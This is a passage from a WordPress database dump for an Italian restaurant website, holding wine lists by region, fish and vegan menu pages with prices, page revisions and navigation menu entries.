21,50\r\n\r\n&nbsp;\r\n\r\nPassopisciaro             Guardiola Sicilia igt “14                                     € 24,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Sardegna…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\nCapichera                   Vigna’ngena Vermentino docg “14                               € 28,00\r\n\r\n&nbsp;\r\n\r\nSella e Mosca             Monteoro Vermentino di Gallura Sup. docg “13        € 19,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPAG. 14','Sicilia, Sardegna','','inherit','open','open','','91-revision-v1','','','2015-08-03 15:43:43','2015-08-03 13:43:43','',91,'http://www.ristorantesolymar.it/2015/08/03/91-revision-v1/',0,'revision','',0),(93,1,'2015-08-03 15:54:50','2015-08-03 13:54:50','<strong><u>Sicilia…………………………………………….</u></strong>\r\n\r\nDonnafugata              La Fuga Chardonnay Entellina “13                             € 19,50\r\n\r\nChiarandà chardonnay Entellina dop “10                  € 32,00\r\n\r\n&nbsp;\r\n\r\nGraci                            Etna bianco doc “12                                            € 19,00\r\n\r\n&nbsp;\r\n\r\nSalvatore Murana     Gadì Bianco di Pantelleria Doc “ 11                    € 21,50\r\n\r\n&nbsp;\r\n\r\nPassopisciaro             Guardiola Sicilia igt “14                                     € 24,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Sardegna…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\nCapichera                   Vigna’ngena Vermentino docg “14                               € 28,00\r\n\r\n&nbsp;\r\n\r\nSella e Mosca             Monteoro Vermentino di Gallura Sup. docg “13        € 19,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nPAG. 14','Sicilia, Sardegna','','inherit','open','open','','91-revision-v1','','','2015-08-03 15:54:50','2015-08-03 13:54:50','',91,'http://www.ristorantesolymar.it/2015/08/03/91-revision-v1/',0,'revision','',0),(96,1,'2015-08-03 16:03:41','2015-08-03 14:03:41','<strong><u>   SOL Y MAR</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Sicilia…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nDonnafugata          La Fuga chardonnay Entellina                        “17       € 20,00\r\n\r\n&nbsp;\r\n\r\nChiarandà chardonnay Entellina D.O.P.       “16       € 32,00\r\n\r\n&nbsp;\r\n\r\nGraci                         Etna bianco D.O.C.                                       “18    € 20,00\r\n\r\n&nbsp;\r\n\r\nMarco de Bartoli     Sole e Vento I.G.T.                                      “17 € 21,00\r\n\r\n&nbsp;\r\n\r\nSP68                         Terre Siciliane Bianco IGT Occhipinti             “18 € 21,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sardegna…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nCapichera               Vigna’ngena Vermentino D.O.C.G.                          “17 € 35,00\r\n\r\n&nbsp;\r\n\r\nCamminera            Adarya Vermentino.                                                 “18   € 19,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nTenuta Dettori       Renosu Bianco                                             “18   € 17,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Sicilia','','publish','closed','closed','','austria-germania-spagna-nuova-zelanda','','','2020-09-26 22:41:17','2020-09-26 20:41:17','',22,'http://www.ristorantesolymar.it/?page_id=96',18,'page','',0),(97,1,'2015-08-03 16:03:41','2015-08-03 14:03:41','<strong><u>Germania………………………………………………………………......</u></strong>\r\n\r\n&nbsp;\r\n\r\nDr. Loosen                           Blau Schiefer Riesling Troken “13                               €  22,00\r\n\r\n&nbsp;\r\n\r\nMarkus Molitor          Riesling Haus Klosterberg Troken “12                        €  21,50\r\n\r\n&nbsp;\r\n\r\nSchloss Johannisberg       Riesling Gelblack Qualitätswein feinherb    “12      €  29,00\r\n\r\n&nbsp;\r\n\r\nKerper                        Riesling Graacher Domfrobst Grobbes Gewàchs “12   €  37,00\r\n\r\nRiesling Wehlener Sonnenuhr Spàtlese Troken “13    €  24,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Spagna……………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia      Vina Gravonia Blanco Crianza “04                              €  23,50\r\n\r\nVina Tondonia Blanco reserva “00                               €  33,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Nuova Zelanda………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nSaint Clair                  Sauvignon Blanc “14                                                       €  27,00\r\n\r\n&nbsp;','Austria, Germania, Spagna, Nuova Zelanda','','inherit','open','open','','96-revision-v1','','','2015-08-03 16:03:41','2015-08-03 14:03:41','',96,'http://www.ristorantesolymar.it/2015/08/03/96-revision-v1/',0,'revision','',0),(98,1,'2018-07-31 07:55:21','2018-07-31 07:55:21','Turpis egestas pretium aenean pharetra magna ac placerat. Vestibulum lectus mauris ultrices eros in cursus, turpis massa tincidunt. Dui ut ornare lectus sit amet est placerat in egestas erat imperdiet sed euismod. Nisi porta lorem mollis aliquam ut porttitor leo a diam sollicitudin tempor id eu. Nunc mi ipsum faucibus vitae aliquet nec, ullamcorper sit amet risus susin.','Crispy Tuna Artichoke','Convallis convallis tellus id interdum velit laoreet id donec ultrices, tincidunt arcu non sodales neque sodales ut etiam sit amet nisl purus in mollis nunc sedid.','publish','open','closed','','crispy-tuna-artichoke','','','2020-12-05 17:06:28','2020-12-05 16:06:28','',0,'http://attika.mikado-themes.com/?post_type=product&amp;p=98',2,'product','',2),(100,1,'2015-08-03 16:09:17','2015-08-03 14:09:17','<u>   SOL Y MAR</u>\r\n\r\n<u>I VINI ROSsI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>   Emilia Romagna………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\nSan Patrignano               Aulente Rosso I.G.T.                                 (NO)     € 16,00\r\n\r\n&nbsp;\r\n\r\nPoderi del Nespoli          Fico Grande Sangiovese D.O.C.                        € 14,00\r\n\r\nPrugneto Sang.Sup. D.O.C.                               € 17,00\r\n\r\n&nbsp;\r\n\r\nMutiliana                         Ecce Draco Pinot Nero I.G.P.                               € 25,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Piemonte………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCa’ del Baio                       Asili barbaresco D.O.C.G.                           € 32,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Alto Adige…………………………………………………………………………</u></strong>\r\n\r\n<u> </u>\r\n\r\nGirlan                               Patricia Pinot Nero D.O.C.                                 € 20,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Marche……..……………………………………………………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\nUmani Ronchi                 Fonte del Re Lacrima di Morro D.O.C.            € 17,00\r\n\r\nTerracruda                       Vettina Pergola Rosso D.O.C.        (NO)   € 14,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Toscana…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\nFattoria Torre a Cona     Chianti colli fiorentini D.O.C.G.                       € 15,00\r\n\r\nCantina di Montalcino     Rosso di Montalcino D.O.C.                         € 18,00\r\n\r\nTunia                                     Chiassobuio Toscana igt                               € 21,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Abruzzo…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nEmidio Pepe                         Montepulciano D’ Abruzzo                             € 40,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia…………………………………………………………………   </u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nDonnafugata                       Sherazade nero d’Avola D.O.C.                   € 28,00\r\n\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>   Spagna…………………………………………………………………………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nLopez de Heredia                 Vina cubillo 2008                                               € 26,00','Vini Rossi','','publish','closed','closed','','vini-rossi','','','2020-06-10 15:35:21','2020-06-10 13:35:21','',22,'http://www.ristorantesolymar.it/?page_id=100',20,'page','',0),(101,1,'2015-08-03 16:09:17','2015-08-03 14:09:17','<u>I VINI ROSsI</u>\r\n\r\n<strong><u> </u></strong>\r\n\r\n<u> </u>\r\n\r\n<strong><u>Emilia Romagna………………………………………………………………...</u></strong>\r\n\r\n&nbsp;\r\n\r\nSan Patrignano                            Aulente Rosso igt “13                                           € 15,00\r\n\r\n&nbsp;\r\n\r\nPoderi del Nespoli              Fico Grande Sangiovese di R Doc “13               € 14,00\r\n\r\nPrugneto sang.Sup. Doc “ 13                              € 16,00\r\n\r\n<u> </u>\r\n\r\nDrei Donà la Palazza                        Notturno sangiovese Forlì igt     “11                  € 16,50\r\n\r\n&nbsp;\r\n\r\nAriola                                   Marcello lambrusco dell’Emilia igt                 € 16,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Piemonte………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nCa’ del Baio                         Asili barbaresco docg   “11                               € 32,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Alto Adige…………………………………………………………………………</u></strong>\r\n\r\n<u> </u>\r\n\r\nGirlan                                   Patricia Pinot Nero doc “11                                 € 17,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Marche……..……………………………………………………………………..</u></strong>\r\n\r\n&nbsp;\r\n\r\nUmani Ronchi                     Fonte del Re Lacrima di Morro doc “13            € 17,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Toscana…………………………………………………………………………….</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nFattoria Torre a Cona          Chianti colli fiorentini docg “12                         € 15,00\r\n\r\nCantina di Montalcino          Rosso di Montalcino Doc  “12”                        € 18,00\r\n\r\nTunia                                            Chiassobuio Toscana igt                               € 21,00\r\n<strong><u>Sicilia………………………………………………………………………………</u></strong>\r\n\r\n<strong><u> </u></strong>\r\n\r\nDonnafugata                        Sherazade nero d’Avola doc “13                      €  17,00\r\n\r\n&nbsp;','Vini Rossi','','inherit','open','open','','100-revision-v1','','','2015-08-03 16:09:17','2015-08-03 14:09:17','',100,'http://www.ristorantesolymar.it/2015/08/03/100-revision-v1/',0,'revision','',0),(102,1,'2015-08-03 16:10:34','2015-08-03 14:10:34','<p style=\"text-align: center\"><strong><em><u>Assemblaggi</u></em></strong></p>\r\nAgrapart &amp; fils                    7 crus Brut     Avize                                                                      € 70,00\r\n\r\nL.Aubry Fils                        Aubry 1er cru. Brut rm Jouy-les-Reims                                   € 50,00\r\n\r\nCuvée de Humbert P.C. Brut “ Jouy-les-Reims                     € 70,00\r\n\r\nBereche et fils                    Brut reserve Craon de Ludes                                                      € 50,00\r\n\r\nReflet d’Antan Brut Craon de Ludes                                         €90,00\r\n\r\nEmmanuel Brochet           Le Mont Benoit Extra Brut Ville-aux-Noeuds                        € 70,00\r\n\r\nRoger Brun                         Brut Reserve à Ay                                                                          € 42,00\r\n\r\nCorbon\r\n\r\nLaherte Frères                    Ultradition Brut Epernay   0,375 ml                                         € 25,00\r\n\r\nUltradition Brut Epernay   0,750 ml                                         € 50,00\r\n\r\nJaquesson &amp;fils                  Cuvee Brut Dizy 743                                                                      € 63,00\r\n\r\nBenoït Lahaye                     Brut Naturessense rm     Bouzy                                                   € 65,00\r\n\r\nViolaine (senza solforosa aggiunta) Bouzy                               € 90,00\r\n\r\nGeorges Laval                     Garennes 1er cru Cumieres                                                         € 68,00\r\n\r\nMarie-Noelle Ledru           Brut Grand.Cru Ambonnay                                                        € 63,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet                                Brut Tradition Grand Cru rm Ambonnay                         € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFranck Pascal               Reliance Brut nature (biologico,biodinamico)\r\n\r\nBaslieux                                                                             € 60,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier            Ultra Brut Nature Tours Sur Marne                                   € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','publish','closed','closed','','piemonte-liguria-lombardia','','','2020-09-26 23:03:21','2020-09-26 21:03:21','',22,'http://www.ristorantesolymar.it/?page_id=102',10,'page','',0),(103,1,'2015-08-03 16:10:34','2015-08-03 14:10:34','<strong><u>Piemonte………………………………………………………………….</u></strong>\r\n\r\n<u> </u>\r\n\r\nGaja                             Rossj-Bass Chardonnay “13                                           €  46,00\r\n\r\nEttore Germano                  Hèrzu Langhe Bianco doc Riesling “13                        €  22,00\r\n\r\nCeretto                        Blangè Arneis doc “13                                                      €  23,00\r\n\r\nPomodolce                            Diletto Timorasso Colli Tortonesi doc “12                    €  18,50\r\n\r\nGrue Timorasso Colli Tortonesi doc “11                       €  25,00\r\n\r\n&nbsp;\r\n\r\nCoppo                          Monteriolo Chardonnay doc “ 10                                 € 31,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>Liguria…………………………………………………………..………….</u></strong>\r\n\r\n&nbsp;\r\n\r\nBio Vio                               Pigato di Albenga doc “13                                                €  18,50\r\n\r\n<strong><u>Lombardia…………………………………………………………..………….</u></strong>\r\n\r\nCà dei Frati                Brolettino doc “13                                                              €  19,50','Piemonte, Liguria, Lombardia','','inherit','open','open','','102-revision-v1','','','2015-08-03 16:10:34','2015-08-03 14:10:34','',102,'http://www.ristorantesolymar.it/2015/08/03/102-revision-v1/',0,'revision','',0),(104,1,'2015-08-03 16:11:12','2015-08-03 14:11:12','<p style=\"text-align: center\"><u>I VINI BIANCHI ITALIANI</u><u></u></p>\r\n<strong><u>   Emilia Romagna</u></strong>\r\n\r\nAncarani                           Famoso Ravenna I.G.T.   ‘18                                                   € 16,00\r\n\r\nTenuta La Palazza          Tornese Chardonnay I.G.T.   ‘18                                            € 20,00\r\n\r\nPoderi del Nespoli          Pagadebit di Romagna D.O.C ‘19                                           € 16,00\r\n\r\nTre Monti                         Sono Chardonnay senza solfiti I.G.P ‘19                               € 19,00\r\n\r\nFattoria Vallona             Ammestesso Pignoletto colli bolognesi D.O.C.                   € 21,00\r\n\r\nSan Patrignano              Aulente I.G.T.   ‘19                                                                       € 16,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Valle d’Aosta</u></strong>\r\n\r\nLes Cretes                        Chardonnay Cuvèe Bois                                                             € 42,00\r\n\r\nPavese Ermes                 Blanc de Morgex et de la Salle D.O.P.                                     € 22,00\r\n\r\n&nbsp;','I vini bianchi italiani','','publish','closed','closed','','trentino-veneto','','','2020-10-24 23:13:12','2020-10-24 21:13:12','',22,'http://www.ristorantesolymar.it/?page_id=104',12,'page','',0),(105,1,'2015-08-03 16:11:12','2015-08-03 14:11:12','<strong><u>Trentino Alto Adige…………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\nHartmann Donà                     Donà Blanc Igt “                                        € 25,50\r\n\r\n&nbsp;\r\n\r\nKossler                                  Gewurztraminer  SAA Doc”                                € 19,50\r\n\r\n&nbsp;\r\n\r\nGirlan                                   Gewurztraminer  SAA Doc”                                € 19,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<ol>\r\n	<li>Michele Appiano Sauvignon St Valentin SAA Doc”             € 32,00</li>\r\n</ol>\r\nGewurztraminer St Valentin SAA Doc”           € 32,00\r\n\r\n&nbsp;\r\n\r\nFalkenstein                          Riesling Doc”                                                          € 23,50\r\n\r\nPinot Bianco Doc”                                                 € 19,50\r\n\r\nSauvignon Doc”                                                     € 22,50\r\n\r\n&nbsp;\r\n\r\nNossing                                 Kerner Valle Isarco Doc”                                     € 22,00\r\n\r\n&nbsp;\r\n\r\nPeter Dipoli                          Voglar Sauvignon Doc”                                      € 23,00\r\n\r\n&nbsp;\r\n\r\nFranz Haas                          Manna Vigneti delle dolomiti IGT”                   € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>Veneto…………………………………………………………………….</u></strong>\r\n\r\n<strong> </strong>\r\n\r\nInama                                   Vulcaia  Fumè  Sauvignon  IGT”                       € 31,00\r\n\r\n&nbsp;\r\n\r\nPra’                                        Straforte Soave classico doc ”                              € 23,00\r\n\r\n&nbsp;\r\n\r\nQuintarelli Giuseppe          Veneto bianco igt                                              € 28,00','Trentino, Veneto','','inherit','open','open','','104-revision-v1','','','2015-08-03 16:11:12','2015-08-03 14:11:12','',104,'http://www.ristorantesolymar.it/2015/08/03/104-revision-v1/',0,'revision','',0),(106,1,'2015-08-03 16:11:54','2015-08-03 14:11:54','<p style=\"text-align: center\"><strong><u>LE NOSTRE PROPOSTE AL BICCHIERE</u></strong></p>\r\n<p style=\"text-align: center\"><strong>BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                      Albiano Verdicchio dei castelli di Jesi Doc 2018             € 4,oo\r\n\r\nLuigi Maffini                           Kratos Fiano D.o.P   ‘16                                                       € 5,oo\r\n\r\nKossler                                  Gewurztraminer   Trentino Alto Adige Doc ‘19                  € 6,oo\r\n\r\nCeretto                                       Blangè                                                                                    € 5,oo\r\n\r\n&nbsp;\r\n\r\nRonco dei Tassi                     Ribolla Gialla (cormons)                                                       € 6,oo\r\n\r\nBachelet Monnot                     Bourgogne Blanc                                                                  € 6,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n&nbsp;\r\n\r\nAdami                    Prosecco Superiore D.o.c.g. Valdobbiadene                                      € 7, oo\r\n\r\nMajolini               Saten millesimato D.o.c.g                                                                       € 7, oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\nFico Grande Romagna Doc               Sangiovese Podere Nespoli                                    € 4,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Vino della ” casa “</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi    Albiano Verdicchio Doc dei castelli di Jesi           Bott. 0,750 l           € 15,oo\r\n\r\nVallona              Pignoletto Frizzante D.O.C. Bott. 0,750 l                                                   € 17,oo\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Vini al bicchiere','','publish','closed','closed','','i-piccoli-formati-da-0-375','','','2020-10-24 22:53:37','2020-10-24 20:53:37','',22,'http://www.ristorantesolymar.it/?page_id=106',1,'page','',0),(107,1,'2015-08-03 16:11:54','2015-08-03 14:11:54','<strong>VINO DELLA CASA</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott. O, 750 l           € 9,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLE NOSTRE PROPOSTE AL BICCHIERE\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi               Albiano Verdicchio dei castelli di Jesi  “13                  € 2,50\r\n\r\nKossler                              Gewurztraminer “14                                                        € 4,00\r\n\r\nPrimosic                      Ribolla Gialla Venezia Giulia igt “13                           € 3,50\r\n\r\n&nbsp;\r\n\r\nSella e Mosca                Monteoro Verm. di Gallura Sup. docg                       € 3,50\r\n\r\n&nbsp;\r\n\r\nPatrice Colin                 Chenin Vieilles vignes  “13                                        € 3,00\r\n\r\n&nbsp;\r\n\r\nMas de Daumas Gassac   Chardonnay    “14                                                      € 3,00\r\n\r\n&nbsp;\r\n\r\nDominique Laurent    Borgogna Aligotè     “14                                             € 4,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>BIANCO FRIZZANTE</strong>\r\n\r\nAdami  <strong>                           </strong>Prosecco Valdobbiadene docg Brut                              € 4,50\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                         € 2,50','Vini al bicchiere','','inherit','open','open','','106-revision-v1','','','2015-08-03 16:11:54','2015-08-03 14:11:54','',106,'http://www.ristorantesolymar.it/2015/08/03/106-revision-v1/',0,'revision','',0),(108,1,'2015-08-03 16:15:09','2015-08-03 14:15:09','<em> Il Pesce</em>\r\n\r\n<em>(Secondi Piatti )</em>\r\n\r\n<em>Mazzancolle nostrane alla griglia con pnzimonio di verdure</em>\r\n\r\n<em>€22,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di Rombo Chiodato ai profumi mediterranei su schiacciata di patate e maionese di polpo (120/140gr)</em>\r\n\r\n<em>€ 2o,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Tataki di Ricciola del Mediterraneo, panzanella di frutta e verdura, maionese di avocado </em>\r\n\r\n<em>€ 20,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La Nostra Catalana tiepida di Astice e Mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Fritto misto con verdurine croccanti   </em><em>€ 23,oo</em>\r\n\r\nLa mezza porzione                                     <em>€ 14,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> </em>\r\n\r\n<em>Lo Spiedone di pesce grigliato e insalatina mista al balsamico</em>\r\n\r\n(La nostra grigliata per pigri)\r\n\r\n<em>€ 20,oo</em>\r\n\r\n&nbsp;\r\n\r\n<em> Per chi non mangia pesce</em>\r\n\r\n<em>Il cannolo croccante di pasta filo e verdure al curry</em>\r\n\r\n<em>€ 11,00</em>\r\n\r\n&nbsp;\r\n\r\n<em>Parmigiana di melanzane(vegano)         </em>\r\n\r\n<em>€ 10,00</em>\r\n\r\n<em> </em>','Il Pesce','','publish','closed','open','','il-pesce','','','2020-07-21 19:54:54','2020-07-21 17:54:54','',10,'http://www.ristorantesolymar.it/?page_id=108',3,'page','',0),(109,1,'2015-08-03 16:15:09','2015-08-03 14:15:09','<em>…Il Pesce</em>\r\n\r\n<em>Mazzancolle nostrane alla griglia con pinzimonio  (2/300gr)</em>\r\n\r\n<em>€ 20,oo     </em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di Rombo chiodato ,crudo e cotto di zucchina e scalogno al vino rosso(130/150 gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Tataky di ricciola grigliato con panzanella di frutta e verdura(cott. Al sangue) (130/140gr)</em>\r\n\r\n<em>€ 18,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Filetto di Tonno alle erbe su crema di topinambur, caramello di colatura e pomodorini al forno(cottura al sangue) (130/150gr)</em>\r\n\r\n<em>€ 17,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La nostra catalana tiepida di Astice e Mazzancolle nostrane</em>\r\n\r\n<em>€ 22,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Frittura mista con verdurine croccanti</em>\r\n\r\n<em>€ 21,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>La Mezza porzione di Frittura con verdure</em>\r\n\r\n<em>€ 12,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Spiedone di pesce grigliato e insalatina mista al balsamico(la nostra grigliata per pigri)</em>\r\n\r\n<em>€ 19,oo</em>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<em>...Vegetables</em>\r\n\r\n<em>Hamburger di soia</em><em> (vegano)</em>\r\n\r\n<em>€ 8,5o</em>\r\n\r\n<em>Fiore di zucca ripieno in guazzetto di pomodorini e olive taggiasche(vegano)</em>\r\n\r\n<em>€ 10,5o</em>\r\n\r\n<em>Crocchette dorate alle verdure </em><em>(vegano)</em>\r\n\r\n<em>€ 10,5o</em>\r\n\r\n<em>Scortichino di seitan e tofu con verdure croccanti al balsamico </em><em>(vegano)</em>\r\n\r\n<em>€ 10,5o</em>\r\n\r\n<em>Fritturina di verdure </em><em>(vegano)</em>\r\n\r\n<em>€ 10,5o</em>\r\n\r\n<em> </em>\r\n\r\n<em>In questo ristorante a causa della difficoltà di reperire Sempre prodotti freschi, talvolta possono essere utilizzati prodotti surgelati all’origine, tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>','Il Pesce','','inherit','open','open','','108-revision-v1','','','2015-08-03 16:15:09','2015-08-03 14:15:09','',108,'http://www.ristorantesolymar.it/2015/08/03/108-revision-v1/',0,'revision','',0),(110,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','110','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=110',14,'nav_menu_item','',0),(111,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','111','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=111',21,'nav_menu_item','',0),(112,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','112','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=112',19,'nav_menu_item','',0),(113,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','113','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=113',22,'nav_menu_item','',0),(115,1,'2015-08-03 16:34:16','2015-08-03 14:34:16',' ','','','publish','open','closed','','115','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=115',29,'nav_menu_item','',0),(117,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','117','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=117',20,'nav_menu_item','',0),(118,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','118','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=118',15,'nav_menu_item','',0),(119,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','119','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=119',16,'nav_menu_item','',0),(120,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' ','','','publish','open','closed','','120','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=120',18,'nav_menu_item','',0),(121,1,'2015-08-03 16:34:15','2015-08-03 14:34:15','','Emilia Romagna / Val D\'Aosta','','publish','open','closed','','emilia-romagna-val-daosta','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=121',17,'nav_menu_item','',0),(122,1,'2015-08-03 16:34:16','2015-08-03 14:34:16',' ','','','publish','open','closed','','122','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=122',26,'nav_menu_item','',0),(123,1,'2015-08-03 16:34:16','2015-08-03 14:34:16','','Champagne – Assemblaggi','','publish','open','closed','','123','','','2020-12-19 08:52:05','2020-12-19 07:52:05','',22,'http://www.ristorantesolymar.it/?p=123',25,'nav_menu_item','',0),(124,1,'2015-08-03 16:34:15','2015-08-03 14:34:15',' 